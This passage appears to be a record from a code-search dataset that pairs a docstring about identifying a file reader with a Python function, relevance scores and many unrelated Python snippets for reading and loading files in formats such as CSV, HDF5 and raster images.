asyncio.gather(*[asyncio.wait_for(reader.read(n), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def read_file(filename):\n if os.path.isfile(filename):\n with open(filename, 'r') as f:\n return f.read()", "def _read(filename, encodings=['ascii', 'utf-8', 'utf-16', 'latin-1']):\n text = None\n\n for encoding in encodings:\n try:\n f = open(filename, encoding=encoding)\n text = f.read()\n f.close()\n except UnicodeDecodeError:\n f.close()\n except UnicodeError:\n f.close()\n except FileNotFoundError:\n raise FileNotFoundError(\"Could not open file.\")\n\n if not text:\n raise UnicodeError(filename)\n\n return text", "def reading(self):\n if (\n self.reading_handle is None\n and self.writing_handle is None\n and self.filename is not None\n ):\n with self._open() as fp:\n self.reading_handle = fp\n try:\n yield\n finally:\n self.reading_handle = None\n else:\n yield", "def read_file(self, filename):\n if self._stream is None:\n raise Exception('cannot read file \"{}\" with a closed FileCabinetReader'.format(filename))\n\n info = self._files.get(filename)\n if info is None:\n raise Exception('no such file \"{}\" in FileCabinet'.format(filename))\n\n self._stream.seek(info.offset)\n return self._stream.read(info.size)", "def read(path, repo=None, rev=None, remote=None, mode=\"r\", encoding=None):\n with open(\n path, repo=repo, rev=rev, remote=remote, mode=mode, encoding=encoding\n ) as fd:\n return fd.read()", "def __init__(self,file_reader):\n self.file_reader = file_reader", "def readfp(self, fp, filename=None):\n if filename is None:\n try:\n filename = fp.name\n except AttributeError:\n filename = '<???>'\n self._read(fp, filename)", "def load_from_filepath(filepath: str, allow_unknown_file_type=False):\n try:\n return load_from_filepath_or_content(filepath, _allow_content=False)\n except NoCompatibleLoaderFoundError:\n if not allow_unknown_file_type:\n raise\n # Load the raw contents from file and assume that they are to be\n # interpreted as a raw string.\n with open(filepath) as f:\n return f.read().strip()", "def read_from_file(self, filename: str) -> None:", "def _read(self, string=\"\", fname=\"\"):\n if string:\n self.handle = gv.readstring(string)\n elif fname == \"stdin\":\n data = sys.stdin.read()\n self.handle = gv.readstring(data)\n else:\n self.handle = gv.read(fname)\n # gv returns None if eg. the input does not exist\n if not self.handle:\n raise ValueError(\"Error with file \" + fname)", "def _next(self, filename):\n try:\n return self.tmp_read[filename]['reader'].__next__()\n except StopIteration:\n return None", "def prepare_reader(self, unused_filename_queue):\n raise NotImplementedError()", "def try_read_file():\n try:\n logging.info('open config file %s', config_file_path)\n with open(config_file_path) as f:\n logging.info('begin io %s', config_file_path)\n config_file = json.load(f)\n logging.info('end io %s', config_file_path)\n return config_file\n except (OSError, IOError) as error:\n logging.info('try_read error %s', error)\n return {}", "def get_object_reader(self, container, object_name, extra_metadata=None):\n return self.oNestObjectReader(container, object_name, self.onest)", "def read(self, reader, font, tableDict):\n raise NotImplementedError(self)", "def InitConfigReader(configFile):\n configReader.readfp(open(configFile))", "def InitConfigReader(configFile):\n configReader.readfp(open(configFile))" ]
[ "0.73507124", "0.6649994", "0.6541662", "0.6465156", "0.6096228", "0.5905837", "0.5818582", "0.5808917", "0.57055247", "0.5697342", "0.5619084", "0.5508928", "0.5467147", "0.5462562", "0.5446384", "0.5420934", "0.5397053", "0.5380353", "0.53490704", "0.5324267", "0.53047097", "0.5296706", "0.52854663", "0.52788246", "0.5269713", "0.52487534", "0.524558", "0.5211467", "0.5204139", "0.5189624", "0.5180335", "0.5167302", "0.5155944", "0.51493365", "0.5142167", "0.51217777", "0.5112193", "0.5075177", "0.50630486", "0.504853", "0.5023408", "0.5016314", "0.50109744", "0.50088876", "0.5005721", "0.5003872", "0.5000394", "0.49999797", "0.49992073", "0.49894333", "0.49832302", "0.4963216", "0.4950762", "0.4942197", "0.49388057", "0.49385813", "0.49333557", "0.49161437", "0.49136788", "0.49022526", "0.4900513", "0.4897072", "0.48946717", "0.48812765", "0.48711404", "0.48709336", "0.4867331", "0.4866217", "0.4860705", "0.4825999", "0.4822746", "0.48169792", "0.48155063", "0.47805688", "0.47775322", "0.47670805", "0.4764369", "0.47564462", "0.47529122", "0.47427332", "0.47390968", "0.4734957", "0.4734", "0.4701112", "0.46970066", "0.46801522", "0.4671134", "0.4667006", "0.46651268", "0.46632677", "0.4659841", "0.46570852", "0.46545932", "0.4652076", "0.4642785", "0.46377578", "0.46354043", "0.4631074", "0.46280175", "0.46280175" ]
0.7362303
0
Identify a reader that can read a given file A NoReaderFound error is raised if no such appropriate reader is found.
def identify(input_stream: IO[bytes]) -> str: import IPython where_am_i = "readers.__init__.identify" IPython.embed() raise exceptions.NoReaderFound( f"Found no reader that can read {input_stream.name}" ) from None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def inferReader(filePath):\n for reg, reader in six.iteritems(REGEXES):\n match = re.match(reg, filePath)\n if match and match.group() == filePath:\n debug('Inferred reader for {}: {}'\n .format(filePath, reader.__name__))\n return reader\n raise SerpentToolsException(\n 'Failed to infer filetype and thus accurate reader from'\n 'file path {}'.format(filePath)\n )", "def _get_reader(self, filepath: str):\n file_extension = os.path.splitext(filepath)[-1]\n\n self._validate_file(filepath)\n\n if file_extension == \".ipynb\":\n return NotebookReader(filepath)\n elif file_extension in [\".py\", \".r\"]:\n return FileReader(filepath)\n else:\n raise ValueError(f\"File type {file_extension} is not supported.\")", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def validate_file(\n file: str,\n format: FormatType = FormatType.csv,\n delimiter: str = ',',\n header_delimiter: str = None,\n skip_blank_lines: bool = True,\n):\n\n with open_resource(file) as resource_io:\n\n if format == FormatType.csv:\n reader = CSVReader(\n resource_io,\n delimiter=delimiter,\n header_delimiter=header_delimiter,\n skip_blank_lines=skip_blank_lines,\n )\n elif format == FormatType.jsonl:\n reader = JSONLReader(resource_io)\n elif format == FormatType.json:\n reader = JSONReader(resource_io)\n else:\n raise ValueError\n\n for _ in reader:\n pass", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "def read(filePath, reader='infer'):\n if isinstance(reader, str):\n if reader == 'infer':\n loader = inferReader(filePath)\n else:\n if reader in READERS:\n loader = READERS[reader]\n else:\n raise SerpentToolsException(\n 'Reader type {} not supported'.format(reader)\n )\n else:\n assert callable(reader), (\n 'Reader {} is not callable'.format(str(reader)))\n loader = reader\n returnedFromLoader = loader(filePath)\n returnedFromLoader.read()\n return returnedFromLoader", "def _resolve_reader(self):\n self.fh = self.path.fs.open(self.path, 'rU')\n self.resolved = csv.reader(self.fh, delimiter=self.delimiter)", "def _check_rasterio_im_load(im):\n if isinstance(im, str):\n return rasterio.open(im)\n elif isinstance(im, rasterio.DatasetReader):\n return im\n else:\n raise ValueError(\n \"{} is not an accepted image format for rasterio.\".format(im))", "def retryable_reads_supported(self):\n ...", "def test_read_raw_suggested(fname):\n with pytest.raises(ValueError, match='Try reading'):\n read_raw(fname)", "def can_load(cls, filename):\n return False", "def test_file_read_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read()", "def can_handle(file_io):\r\n raise NotImplementedError(\"Please implement this in your importer\")", "def test_read_raw_unsupported_single(fname):\n with pytest.raises(ValueError, match='Unsupported file type'):\n read_raw(fname)", "def get_file_reader(path):\n return get_by_scheme(path, SCHEMAS_TO_FILEREADERS, LocalFileReader)", "def get_reader_fn(input_fp=None):\n if input_fp is None:\n return OdpsTableReader if \"PAI\" in tf.__version__ else CSVReader\n\n if \"odps://\" in input_fp:\n return OdpsTableReader\n else:\n return CSVReader", "def read_elongation(file_name):\n extension = file_name.split('.')[-1]\n\n if extension == 'prn':\n return read_prn(file_name)\n elif extension == 'csv':\n return read_csv(file_name)\n else:\n raise NotImplementedError(f'Reading {extension} files is not yet implemented.')", "def isDataSourceReadable(self):\r\n\r\n readable = True\r\n start, stop = self.getReadParameters(\\\r\n numpy.array(0, dtype=numpy.int64), self.chunk_size)\r\n try:\r\n self.data_source.read(start, stop)\r\n except tables.HDF5ExtError:\r\n readable = False\r\n print(translate('Buffer',\r\n \"\"\"\\nError: problems reading records. The dataset seems \"\"\"\r\n \"\"\"to be compressed with the {0} library. Check that it \"\"\"\r\n \"\"\"is installed in your system, please.\"\"\",\r\n 'A dataset readability error').\\\r\n format(self.data_source.filters.complib))\r\n\r\n return readable", "def CaseReader(filename):\n\n try:\n reader = SqliteCaseReader(filename)\n return reader\n except IOError:\n # filename not a valid Sqlite database file\n pass\n\n try:\n reader = HDF5CaseReader(filename)\n return reader\n except IOError:\n raise IOError('Unable to load cases from file {0}'.format(filename))", "def _check_valid_file(self, file):\n\n try:\n _ = open(f\"{file}\")\n except FileNotFoundError:\n raise ValueError", "def test_reader_instantiates(self):\n cr = CaseReader(self.filename)\n self.assertTrue(isinstance(cr, HDF5CaseReader), msg='CaseReader not'\n ' returning the correct subclass.')", "def test_call_requires_read_1_file(self):\r\n p = RtaxTaxonAssigner({\r\n 'reference_sequences_fp': self.reference_seqs_fp,\r\n 'id_to_taxonomy_fp': self.id_to_taxonomy_fp})\r\n\r\n # no read_1_seqs_fp passed results in AssertionError\r\n self.assertRaises(AssertionError, p, self.input_seqs_fp)", "def check_rasterio_im_load(im):\n if isinstance(im, (str, Path)):\n if not is_url(im) and 'VRTDataset' not in str(im):\n im = to_absolute_path(str(im))\n return rasterio.open(im)\n elif isinstance(im, rasterio.DatasetReader):\n return im\n else:\n raise ValueError(\"{} is not an accepted image format for rasterio.\".format(im))", "def is_resource(self, path):\n # type: (Text) -> bool\n raise FileNotFoundError", "def open_reader(self, **kw):\n return self.table.open_reader(str(self), **kw)", "def test_file_readlines_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).readlines()", "def my_reader(filename, sheetname='Sheet1', separ=','):\r\n global df_read\r\n filename_list = filename.split('.')\r\n extension = filename_list[-1]\r\n if extension == 'csv':\r\n df_read = pd.read_csv(filename, sep=separ)\r\n if extension == 'data':\r\n df_read = pd.read_csv(filename, sep=separ, header=None)\r\n if extension == 'txt':\r\n df_read = pd.read_csv(filename, sep=separ)\r\n if extension == 'json':\r\n df_read = pd.read_json(filename)\r\n if extension == 'html':\r\n df_read = pd.read_html(filename)\r\n if extension == 'xls':\r\n df_read = pd.read_excel(pd.ExcelFile(filename), sheetname)\r\n if extension == 'xlsx':\r\n df_read = pd.read_excel(pd.ExcelFile(filename), sheetname)\r\n if extension == 'feather':\r\n df_read = pd.read_feather(filename)\r\n if extension == 'parquet':\r\n df_read = pd.read_parquet(filename)\r\n if extension == 'msg':\r\n df_read = pd.read_msgpack(filename)\r\n if extension == 'dta':\r\n df_read = pd.read_stata(filename)\r\n if extension == 'sas7bdat':\r\n df_read = pd.read_sas(filename)\r\n if extension == 'pkl':\r\n df_read = pd.read_pickle(filename)\r\n return df_read", "def search_registry(filename):\n for converter in data_importers:\n if converter.check_importable(filename):\n return converter\n logging.error('No converter found', filename)\n return False", "def can_handle(file_io):\r\n\r\n try:\r\n file_io.seek(0)\r\n parsed = etree.parse(file_io)\r\n except XMLSyntaxError:\r\n # IF etree can't parse it, it's not our file.\r\n return False\r\n can_handle = False\r\n can_handle = DelXMLImporter._is_delicious_format(parsed,\r\n can_handle)\r\n\r\n # make sure we reset the file_io object so that we can use it again\r\n return can_handle", "def test_file_readas_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_as(\"utf-8\")", "def FileCheck(fn):\n try:\n open(fn, \"r\")\n return 1\n except IOError:\n print(\"Error: File does not exist.\")\n return 0", "def read_file(self) -> misc_.file_readers.FileReaderHandler:\n\t\treturn self._read_file", "def canRead(*args, **kwargs):\n return TiffFileTileSource.canRead(*args, **kwargs)", "def test_file_reader(self) -> None:\n result = [['123', 'Jin He', 'Computer Science'],\n ['234', 'Nanda Koka', 'Software Engineering'],\n ['345', 'Benji Cai', 'Software Engineering']]\n # file have header\n self.assertTrue(\n list(file_reader('C:/Users/Nidhi/Desktop/SEM3/810/HW08/student_majors.txt', 3, '|', True)) == result)\n # file without header\n self.assertFalse(\n list(file_reader('C:/Users/Nidhi/Desktop/SEM3/810/HW08/student_majors.txt', 3, '|')) == result)\n # More than 3 datafield\n with self.assertRaises(ValueError):\n list(file_reader(\n 'C:/Users/Nidhi/Desktop/SEM3/810/HW08/student_majors.txt', 4, '|', True))\n # file not found\n with self.assertRaises(FileNotFoundError):\n list(file_reader('abc.txt', 3, '|', True))", "def read_file(\n file_path: Union[str, pathlib.Path],\n reader_name: Optional[str] = None,\n **reader_args: Any,\n) -> Reader:\n with open(file_path, mode=\"rb\") as input_stream:\n return read_stream(input_stream, reader_name)", "def canRead(*args, **kwargs):\n return GDALFileTileSource.canRead(*args, **kwargs)", "def test_read_raw_supported(fname):\n read_raw(fname)\n read_raw(fname, verbose=False)\n raw = read_raw(fname, preload=True)\n assert \"data loaded\" in str(raw)", "def _get_reader_class(basename: str) -> Type[BaseEEGReader]:\n if basename.endswith(\".h5\"):\n return RamulatorHDF5Reader\n elif basename.endswith((\".bdf\", \".mff\", \".raw\")):\n return ScalpEEGReader\n elif basename.endswith(\".npy\"):\n return NumpyEEGReader\n else:\n return SplitEEGReader", "def check_file_open(filename: str, err_string: str, required: bool = False) -> None:\n if required or filename is not None:\n if filename is None:\n print('\\n' + err_string + '\\n')\n sys.exit(1)\n else:\n try:\n pathlib.Path(filename).resolve(strict=True)\n except FileNotFoundError:\n print('\\n' + err_string + '\\n')\n sys.exit(1)", "def match(self, input_reader):\n pass", "def reader_from_file(load_dir: str, **kwargs):\n shared_resources = create_shared_resources()\n shared_resources.load(os.path.join(load_dir, \"shared_resources\"))\n if kwargs:\n shared_resources.config.update(kwargs)\n reader = readers[shared_resources.config[\"reader\"]](shared_resources)\n reader.load_and_setup_modules(load_dir)\n return reader", "def is_readable(self):\n raise NotImplementedError()", "def get_rdf_reader(file_path, format='nt'):\n iterator = None\n nb_triples = 0\n # load standard RDF formats using rdflib\n if format == 'nt' or format == 'ttl':\n g = Graph()\n g.parse(file_path, format=format)\n nb_triples = len(g)\n iterator = map(__n3_to_str, g.triples((None, None, None)))\n elif format == 'hdt':\n # load HDTDocument without additional indexes\n # they are not needed since we only search by \"?s ?p ?o\"\n doc = HDTDocument(file_path, indexed=False)\n iterator, nb_triples = doc.search_triples(\"\", \"\", \"\")\n return iterator, nb_triples", "def legacy_get_reader(self, **kwargs):\n\n # Note: this will break thread-safety\n self._request._kwargs = kwargs\n\n # safeguard for DICOM plugin reading from folders\n try:\n assert Path(self._request.filename).is_dir()\n except OSError:\n pass # not a valid path on this OS\n except AssertionError:\n pass # not a folder\n else:\n return self._format.get_reader(self._request)\n\n self._request.get_file().seek(0)\n return self._format.get_reader(self._request)", "def _haveReadLocks(self): \n readLockFileName = ReadLock.fileName\n for name in os.listdir(self.dir):\n if name.startswith(readLockFileName):\n return True\n return False", "def guess_reader_method_from_path(path: str):\n path = path.lower()\n if path.endswith(\".csv\") or path.endswith(\".tsv\"):\n return \"csv\"\n elif (\n path.endswith(\".parquet\") or path.endswith(\".parq\") or path.endswith(\".pqt\")\n ):\n return \"parquet\"\n\n raise ExecutionEngineError(\n f\"Unable to determine reader method from path: {path}\"\n )", "def resolve(self, resource, resourceType = None):\n for loader in self.__loaders:\n if loader.supports(resource, resourceType):\n return loader;\n\n return False;", "def is_available(self, fname, downloader=None):\n self._assert_file_in_registry(fname)\n url = self.get_url(fname)\n if downloader is None:\n downloader = choose_downloader(url)\n try:\n available = downloader(url, None, self, check_only=True)\n except TypeError as error:\n error_msg = (\n f\"Downloader '{str(downloader)}' does not support availability checks.\"\n )\n raise NotImplementedError(error_msg) from error\n return available", "def read(self, file_name):\n msg = \"ReaderWriterBase::read called!\"\n raise NotImplementedError(msg)", "def isReadable(self, name):\n pass", "def can_open_stream(self):\n return True", "def test_fast_reader():\n text = \"a b c\\n1 2 3\\n4 5 6\"\n with pytest.raises(ParameterError): # C reader can't handle regex comment\n ascii.read(text, format=\"fast_basic\", guess=False, comment=\"##\")\n\n # Enable multiprocessing and the fast converter\n try:\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": True, \"use_fast_converter\": True},\n )\n except NotImplementedError:\n # Might get this on Windows, try without parallel...\n if os.name == \"nt\":\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": False, \"use_fast_converter\": True},\n )\n else:\n raise\n\n # Should raise an error if fast_reader has an invalid key\n with pytest.raises(FastOptionsError):\n ascii.read(text, format=\"fast_basic\", guess=False, fast_reader={\"foo\": True})\n\n # Use the slow reader instead\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\", fast_reader=False)\n # Will try the slow reader afterwards by default\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\")", "def _next(self, filename):\n try:\n return self.tmp_read[filename]['reader'].__next__()\n except StopIteration:\n return None", "async def read_or_exc(reader, n, timeout = None):\n\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.read(n), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def get_read_parser(format):\n format = format.lower()\n if format == 'bed':\n return BedReadParser\n elif format == 'bedpe':\n return BedPeReadParser\n elif format == 'sam':\n return SamReadParser\n elif format == 'bam':\n return BamReadParser\n else:\n raise ValueError(f\"unknown read file format: {format!r}\")", "def try_read(device_file):\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines", "def readable(obj: Any) -> bool:\n\n return callable(getattr(obj, \"read\", None))", "def rnn_reader(file_path, word_dict, is_infer):\n\n def reader():\n with open(file_path) as f:\n for line_id, line in enumerate(f):\n yield record_reader(line, word_dict, is_infer)\n\n return reader", "def get_reader(fname):\n\n if fname == \"-\":\n fh = sys.stdin\n else:\n fh = open(fname, \"r\")\n \n rdr = csv.reader(fh, dialect=\"psv\")\n return (rdr, fh)", "def load_rule_files ( self, files_or_dirs, ignore_missing=False ):\n if ignore_missing:\n try:\n ret = self._resolver.get_reader().read ( files_or_dirs )\n except IOError as ioerr:\n if ioerr.errno == errno.ENOENT:\n ret = False\n else:\n raise\n else:\n ret = self._resolver.get_reader().read ( files_or_dirs )\n\n self.fixup_pool_id()\n return True if ret is None else ret", "def canRead(*args, **kwargs):\n return MultiFileTileSource.canRead(*args, **kwargs)", "def _looks_like_resource_file(self, name):\n # inefficient since we end up reading the file twice,\n # but it's fast enough for our purposes, and prevents\n # us from doing a full parse of files that are obviously\n # not robot files\n\n if (re.search(r'__init__.(txt|robot|html|tsv)$', name)):\n # These are initialize files, not resource files\n return False\n\n found_keyword_table = False\n if (name.lower().endswith(\".robot\") or\n name.lower().endswith(\".txt\") or\n name.lower().endswith(\".tsv\") or\n name.lower().endswith(\".resource\")):\n\n with open(name, \"r\") as f:\n data = f.read()\n for match in re.finditer(r'^\\*+\\s*(Test Cases?|(?:User )?Keywords?)',\n data, re.MULTILINE|re.IGNORECASE):\n if (re.match(r'Test Cases?', match.group(1), re.IGNORECASE)):\n # if there's a test case table, it's not a keyword file\n return False\n\n if (not found_keyword_table and\n re.match(r'(User )?Keywords?', match.group(1), re.IGNORECASE)):\n found_keyword_table = True\n return found_keyword_table", "def smart_open(filename, *args, **kwargs):\n return LOADERS.get(os.path.splitext(filename)[1], open)(filename, *args, **kwargs)", "def object_readers(name, *, specify_reader=False):\n\treturn object_access('read', name, specify_reader)", "def test_detect(self):\n r = RscHtmlReader()\n fname = '10.1039_C6OB02074G.html'\n f = io.open(os.path.join(os.path.dirname(__file__), 'data', 'rsc', fname), 'rb')\n content = f.read()\n self.assertEqual(r.detect(content, fname=fname), True)", "def _IsResourceFile(self, path):\n\n raise NotImplementedError", "def test_file_read_bin_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_bin()", "def get_reader_class(cls) -> Type[SpectrumReader]:\n raise NotImplementedError(SpectrumWriter.get_reader_class.__qualname__)", "def CheckRead(read_name, seq, break_line, quality, fastq_fp, line_num):\n if not read_name[0] == \"@\":\n raise Exception(\"Read name does not start with @, line # {}\\n File: {}\".format(\n line_num, fastq_fp))\n for x in seq.upper():\n if x not in [\"A\",\"C\",\"T\",\"G\",\"N\"]:\n raise Exception(\"Sequence value {} not recognized. Line # {}\\n File: {}\".format(\n x, line_num + 1, fastq_fp))\n if not break_line[0] == \"+\":\n raise Exception(\"Break line not '+'. Instead '{}'. Line # {}\\n File: {}\".format(\n break_line[0],line_num + 2, fastq_fp))\n if not len(quality) == len(seq):\n raise Exception(\"Quality line wrong length. Lines # {}\\n File: {}\".format(\n line_num + 3, fastq_fp))", "def _file_read(fname):\n if not os.path.exists(fname):\n parser.error(\"File '{0}' not found.\".format(fname))\n return open(fname, 'r')", "def load_data_reader(data_reader=\"SpreadsheetDataReader\"):\n return importlib.import_module('c302.%s'%data_reader)", "def reader(name, version=None, mimetype=None):\n\treturn _data_processor('read', name, version, mimetype)", "def register_reader(self, fileobj, callback: typing.Callable[..., None], *args):\n if fileobj.fileno() in self.selector.get_map():\n if self.selector.get_key(fileobj).events == selectors.EVENT_WRITE:\n # If the item exists and is registered for just WRITE, listen for READ too\n self.selector.modify(fileobj, selectors.EVENT_READ | selectors.EVENT_WRITE)\n else: # If it isn't, make it just listen for read.\n self.selector.register(fileobj, selectors.EVENT_READ)\n self._readers[fileobj.fileno()] = (callback, args) # Cache our callback, overwrites if one already exists", "def load_input_reader(input_params):\n if \"abstract\" in input_params:\n driver_name = input_params[\"abstract\"][\"format\"]\n elif \"path\" in input_params:\n input_file = input_params[\"path\"]\n driver_name = driver_from_file(input_file)\n else:\n raise errors.MapcheteDriverError(\n \"invalid input parameters %s\" % input_params)\n if driver_name not in available_input_formats():\n raise errors.MapcheteDriverError(\n \"driver %s not found in %s\" % (\n driver_name, available_input_formats())\n )\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n try:\n # instanciate dummy input reader to read metadata\n input_reader = v.load().InputData.__new__(\n v.load().InputData, input_params)\n if input_reader.METADATA[\"driver_name\"] == driver_name:\n return v.load().InputData(input_params)\n except (AttributeError, errors.MapcheteConfigError):\n pass\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name)", "def getReaderByExtension(self, ext, isRGB = 0):\n\t\tassert ext in self.extMapping, \"Extension not recognized: %s\" % ext\n\t\tmpr = self.extMapping[ext]\n\t\tprefix=\"vtk\"\n\t\t# If it's a tiff file, we use our own, extended TIFF reader\n\t\tif self.extMapping[ext] == \"TIFF\":\n\t\t\tmpr = \"ExtTIFF\"\n\t\t\tprefix=\"vtkbxd\"\n\t\tself.rdrstr = \"%s.vtk%sReader()\" % (prefix, mpr)\n\t\trdr = eval(self.rdrstr)\n\t\tif ext == \"bmp\":\n\t\t\trdr.Allow8BitBMPOn()\n\t\tif ext == \"tiff\":\n\t\t\trdr.SetFileLowerLeft(self.flipVertically)\n\t\treturn rdr", "def test_read_different_location(self):\n try:\n self.reader.read(self.books[1], 0, 1)\n self.fail(\"Readed book was not in the library\")\n except AssertionError:\n pass", "def _check_file(cls, file: IO[DiskType]):\n if file.closed:\n raise ValueError(f\"File is closed\")", "def canread(self):\n return False", "def file_checker(file_name):\n if os.path.islink(file_name):\n print \"Crypto device Symlink %s exists\" % file_name\n return True\n else: \n try:\n with open(file_name):\n print \"File %s exists\" % file_name\n return True\n except IOError:\n print \"File %s does not exists\" % file_name\n return False", "def read_image(fname, roi=None, dset_name='default', parallelism=1):\n\n from functools import partial\n from numpy import array, ndarray\n from multiprocessing import Pool, cpu_count\n\n if isinstance(fname, str):\n fmt = fname.split('.')[-1]\n \n if fmt == '.h5' or fmt == '.hdf5':\n reader = partial(readers[fmt], roi=roi, dset_name=dset_name)\n else:\n reader = partial(readers[fmt], roi=roi)\n \n result = reader(fname)\n\n elif isinstance(fname, (tuple, list, ndarray)):\n fmt = fname[0].split('.')[-1]\n if fmt == '.h5' or fmt == '.hdf5':\n reader = partial(readers[fmt], roi=roi, dset_name=dset_name)\n else:\n reader = partial(readers[fmt], roi=roi)\n\n if parallelism == 1:\n result = array([reader(f) for f in fname])\n\n else:\n if parallelism == -1:\n num_cores = cpu_count()\n else:\n num_cores = min(parallelism, cpu_count())\n\n with Pool(num_cores) as pool:\n result = array(pool.map(reader, fname))\n else:\n raise TypeError(\n \"First argument must be string for a one file or (tuple, list, ndarray) for many files\"\n )\n\n return result", "def __is_file_eligible_to_scan(cls, path_to_test):\n return path_to_test.endswith(\".md\")", "def is_declaring_file(self, address, file_path):", "def _load_catalog_reader_class(\n self, catalog: ComponentCatalogMetadata, file_types: List[str]\n ) -> Optional[ComponentCatalogConnector]:\n try:\n catalog_reader = entrypoints.get_group_named(\"elyra.component.catalog_types\").get(catalog.schema_name)\n if not catalog_reader:\n self.log.error(\n f\"No entrypoint with name '{catalog.schema_name}' was found in group \"\n f\"'elyra.component.catalog_types' to match the 'schema_name' given in catalog \"\n f\"'{catalog.display_name}'. Skipping...\"\n )\n return None\n\n catalog_reader = catalog_reader.load()(file_types, parent=self.parent)\n except Exception as e:\n self.log.error(f\"Could not load appropriate ComponentCatalogConnector class: {e}. Skipping...\")\n return None\n\n return catalog_reader", "def test_read_fail1(self):\n mod_fn = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_bad_data1.mod')\n with self.assertRaises(ValueError):\n modreader.get_data(mod_fn) # missing 'IMOD' start", "def readFromFile(filename):\n raise NotImplementedError", "def is_file_readable(local_path, reporter=None):\n if not os.path.exists(local_path):\n if reporter is not None:\n reporter.local_access_error(local_path)\n return False\n elif not os.access(local_path, os.R_OK):\n if reporter is not None:\n reporter.local_permission_error(local_path)\n return False\n return True", "def try_read_file():\n try:\n logging.info('open config file %s', config_file_path)\n with open(config_file_path) as f:\n logging.info('begin io %s', config_file_path)\n config_file = json.load(f)\n logging.info('end io %s', config_file_path)\n return config_file\n except (OSError, IOError) as error:\n logging.info('try_read error %s', error)\n return {}", "def test_read_type_error():\n filename = {}\n with pytest.raises(TypeError):\n read_file(filename)", "def dam_snli_reader(resources_or_conf: Union[dict, SharedResources] = None):\n from jack.readers.multiple_choice.shared import MultipleChoiceSingleSupportInputModule\n from jack.readers.natural_language_inference.decomposable_attention import DecomposableAttentionModel\n from jack.readers.multiple_choice.shared import SimpleMCOutputModule\n shared_resources = create_shared_resources(resources_or_conf)\n\n input_module = MultipleChoiceSingleSupportInputModule(shared_resources)\n model_module = DecomposableAttentionModel(shared_resources)\n output_module = SimpleMCOutputModule(shared_resources)\n return TFReader(shared_resources, input_module, model_module, output_module)", "def fit_reader(self, reader):\n return self.fit(line for (_, line) in reader.readsents(silent=False))", "def get_parallel_reader(path):\n return get_by_scheme(path, SCHEMAS_TO_PARALLELREADERS, LocalParallelReader)", "def _get_reader_fn(self, reader, reader_method=None, path=None) -> Callable:\n if reader_method is None and path is None:\n raise ExecutionEngineError(\n \"Unable to determine spark reader function without reader_method or path\"\n )\n\n if reader_method is None:\n reader_method = self.guess_reader_method_from_path(path=path)\n\n reader_method_op: str = reader_method.lower()\n try:\n if reader_method_op == \"delta\":\n return reader.format(reader_method_op).load\n return getattr(reader, reader_method_op)\n except AttributeError:\n raise ExecutionEngineError(\n f\"Unable to find reader_method {reader_method} in spark.\",\n )", "def test_load_measure_definition_missing_file():\n with pytest.raises(IOError):\n code_reader.load_quality_codes(json_path='missing_path')", "def read_file(self):\n try:\n self.json_parsed_file = parse_progress_report(self.in_file)\n self.output_message += 'Student: {}, {}\\n'.format(self.json_parsed_file['id'],\n self.json_parsed_file['name'])\n return True\n\n except IOError:\n self.output_message += \"File does not exist\\n\"\n self.is_parsed_pdf_valid = False\n return False\n\n except TypeError:\n self.output_message += \"There is an issue with the file\\n\"\n self.is_parsed_pdf_valid = False\n return False", "def exists(reader_name: str) -> bool:\n return plugins.exists(package_name=__name__, plugin_name=reader_name)", "def test_failures(self):\n reader = TextReader('jacksheet', subject='R1XXX', localization=0)\n with pytest.raises(FileNotFoundError):\n reader.load()", "def test_reader(self):\n default_list_file = GAMEBASE + \"/Lists/char-LIST.tex\"\n output = name_pdfs.read_names_file(default_list_file)\n self.assertIsInstance(output, dict)\n self.assertGreater(len(output), 0)\n # Check that the function returns a dict ✓\n # Of greater than length 0 ✓\n fname = \"\"\n for example in self.bad_filenames:\n with self.subTest(fname=example):\n with self.assertRaises(OSError):\n name_pdfs.read_names_file(fname)", "def identify_file(self, file):", "def recognize(self, filename):\n fileBasename = os.path.basename(filename)\n startsWithDigit = re.search(r'^\\d', fileBasename)\n mat = self.startsWithMatcher.match(fileBasename)\n if not mat and not startsWithDigit:\n return None\n else:\n if mat: startsWith = mat.group(1)\n else: startsWith = ''\n if startsWith == '' and not startsWithDigit: return None\n for matcher, ipath, dataset, ns in self.matchers[startsWith]:\n filePatternMatch = matcher.match(fileBasename)\n if filePatternMatch:\n self._setCurrent(matcher, ipath, dataset, ns,\n filePatternMatch.groupdict())\n return ipath\n return None" ]
